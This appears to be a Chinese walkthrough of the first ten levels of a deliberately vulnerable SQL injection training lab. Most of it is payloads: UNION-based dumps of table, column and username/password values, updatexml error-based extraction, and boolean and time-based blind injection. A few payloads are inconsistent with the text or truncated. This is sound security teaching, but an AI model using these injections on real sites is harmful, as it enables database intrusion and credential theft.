文章目录
less-1
1、提示输入参数id,且值为数字;
2、判断是否存在注入点
php
id=1'
data:image/s3,"s3://crabby-images/ae201/ae20129b66083dc681b2ab189c17ea2ad9fe3581" alt=""
报错,说明存在 SQL注入漏洞。
3、判断字符型还是数字型
php
id=1 and 1=1 --+
id=1 and 1=2 --+
id=1" --+
注意,注释
#
可能没有--+
好使
data:image/s3,"s3://crabby-images/635dc/635dc0d00d63bc3b0dfefeb8e8daf5dc3ae045e3" alt=""
data:image/s3,"s3://crabby-images/ac44a/ac44a762159e9a51a3806e1cd48ae478fdd3060c" alt=""
两次页面返回均正常,说明为字符型注入。
下面判断闭合类型:
也可以从报错的地方看出是单引号闭合。
data:image/s3,"s3://crabby-images/bdc6f/bdc6f0f1016783d4a0d077e46034308bb22fe9ac" alt=""
可以看出是单引号闭合。
综上,该关卡属于字符型注入,且闭合符号为单引号。
4、判断字段数
php
id=1' order by 3 --+
data:image/s3,"s3://crabby-images/d8b51/d8b51e5f15f14df0ec69435f224c57f83e1f2669" alt=""
字段数为三,也就是说sql查询的结果中,有三列数据。
5、查看回显点
php
id=-1' union select 1,2,3 --+
data:image/s3,"s3://crabby-images/70e25/70e2582fda6d9e2b95b5c40a8ffa1046a4b9de4a" alt=""
注意:要确保
union select
前面的语句,也就是id在数据库中是不存在的,才会看到回显点。
6、查看数据库名
php
id=-1' union select 1,(select database()),3 --+
data:image/s3,"s3://crabby-images/aff21/aff210f986891e5a3ee1bc6c797a1f3add033c9b" alt=""
可以得到数据库名为
security
.
7、查看表名
php
id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
data:image/s3,"s3://crabby-images/705d4/705d4cd697d0c24bbcec2a349d507482dd6c317a" alt=""
可以看出
security
表中,有四张表。
8、查看字段名
php
id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+
data:image/s3,"s3://crabby-images/6372a/6372a4df601bd946b295af1c07a5dc6b7158efea" alt=""
9、查看字段值
php
id=-1' union select 1,(select group_concat(concat(username,'%23',password)) from security.users),3 --+
data:image/s3,"s3://crabby-images/06144/061446cb1e675881f4eede20c1846763c863e377" alt=""
下面主要介绍思路,就不全流程走完了。
less-2
data:image/s3,"s3://crabby-images/cab1b/cab1b42d9f4cc2c3158e9de1a70296ae2f034189" alt=""
1、判断是否存在注入漏洞
php
id=1'
data:image/s3,"s3://crabby-images/47093/47093d271907fc561b4937cf378c5339c36d8aef" alt=""
说明存在SQL注入漏洞。
2、判断字符型还是数字型
php
id=1 and 1=1 --+
id=1 and 1=2 --+
说明属于数字型注入。
3、判断字段数
php
id=1 order by 3 --+
>后面的步骤和前一关一样,在这里不在赘述。
less-3
1、用单引号判断是否存在sql注入。
说明存在sql注入漏洞。
2、判断字符型还是数字型
返回正常,说明属于字符型注入。
下面确定闭合符号:
从这里看出,后端代码是在id值后面加了
')
,再进行查询的。所以,闭合符号为
')
。
less-4
用单引号判断是否存在sql注入。
单引号不行,试试双引号,
data:image/s3,"s3://crabby-images/2796b/2796bce14a481ef5e8bed5b0501e850571c814b2" alt=""
说明存在SQL注入漏洞。单引号没反应,只能说明此处的闭合方式没用到单引号,试试其他符号。
data:image/s3,"s3://crabby-images/a9867/a9867942844131947e522124e7821e7c0eb11bf5" alt=""
从这里可以看出,闭合方式是双引号+单括号。最外面的那个单引号是为了区分其他无关报错信息。
less-5
用单引号判断是否存在SQL注入漏洞
可以看到,存在SQL注入漏洞,且闭合符号为单引号。
data:image/s3,"s3://crabby-images/257c4/257c41edbf920e7697f3361f360843b6a1929077" alt=""
因为页面没有回显,所以,这里,我们不能用联合查询,需要用盲注。
data:image/s3,"s3://crabby-images/580eb/580ebb36fccbe6c3412526384208dbbd59514e5b" alt=""
data:image/s3,"s3://crabby-images/4be95/4be956b87d9d40b51718e5bd160930d2fd38e1ff" alt=""
可以看到,此处只有两种页面显示,可以使用布尔盲注;
因为有报错,所以也可以使用报错注入。
使用盲注,直接判断数据库长度
php
id=1' and length(database())=8 --+ //判断数据库名长度
data:image/s3,"s3://crabby-images/0696e/0696e514b8d3848d14ba06802c7170782cbb4b92" alt=""
说明当前数据库名的长度为8,这里就不演示布尔盲注,太麻烦了~盲注。
这里使用报错注入进行演示:
(1)查数据库名
php
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
data:image/s3,"s3://crabby-images/275fe/275fe8d6e1a5a0d0691b846956103178173f8b23" alt=""
(2)查表名
php
id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+
data:image/s3,"s3://crabby-images/6a164/6a164843e391d5f13a7d9ca08f989afbe1b236f0" alt=""
(3)查字段名
php
id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
data:image/s3,"s3://crabby-images/f6239/f62398983f5ae2469e22da3d8239372db3f54c75" alt=""
(4)查字段值
php
id=1' and updatexml(1,concat(0x7e,(select group_concat(concat(username,'%23',password)) from security.users),0x7e),1) --+
data:image/s3,"s3://crabby-images/09ba4/09ba4f25f201767bbb40d5b9041bca53dfd90e06" alt=""
注意:该语句对输出的字符长度也做了限制,其最长输出32位。
less-6
单引号判断是否存在sql注入漏洞;
单引号不行,双引号上,成了~
可以看出,只有双引号闭合,故试试:
既然有报错,那就用报错注入吧~
查数据库名
php
id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
data:image/s3,"s3://crabby-images/ea6e8/ea6e84ccea30a54b3fee4dd70a304f6fcc04ddea" alt=""
后面就不多赘述了~
less-7
用单引号判断是否存在sql注入
页面返回不一样,所以存在SQL注入漏洞,但是没有报错也没有回显,只能使用盲注。
需要试试,出来闭合符号为'))
使用布尔盲注,直接判断数据库长度
php
id=1')) and length(database())=8 --+ //判断数据库名长度
data:image/s3,"s3://crabby-images/85db5/85db535200b6857c80f73a1970bfda309bcb53de" alt=""
less-8
通过单引号判断存在 sql注入漏洞;同时,发现闭合引号就是单引号。因为此处没有报错,也没有回显,只能用布尔盲注。
使用布尔盲注,直接判断数据库长度
php
id=1')) and length(database())=8 --+ //判断数据库名长度
data:image/s3,"s3://crabby-images/eba54/eba548fb9d235f90c90a538a704bb7bc72c46eb5" alt=""
less-9
这一关需要用时间盲注,payload:
php
id=1 and sleep(5) --+ //数字型则等待5秒
id=1' and sleep(5) --+ //字符型则等待5秒
data:image/s3,"s3://crabby-images/dd495/dd4950c8b839adfdd4b673429b1cb0b5d14c074b" alt=""
可知存在SQL注入漏洞,闭合符号为单引号,且类型属于时间盲注。
使用时间盲注,直接判断数据库长度
php
id=1' and if(length(database())=8,sleep(5),1) --+ //猜数据库名长度
data:image/s3,"s3://crabby-images/b7420/b74201dbf10d7ac8aa3dcf9eba6a7b1cbc83b483" alt=""
数据库长度为8,后续就是一个一个字母猜数据库名,然后表名、字段名、字段内容,在这里不在赘述。
less-10
这一关与前一关得区别主要是,闭合符号换成了双引号,其余都一样。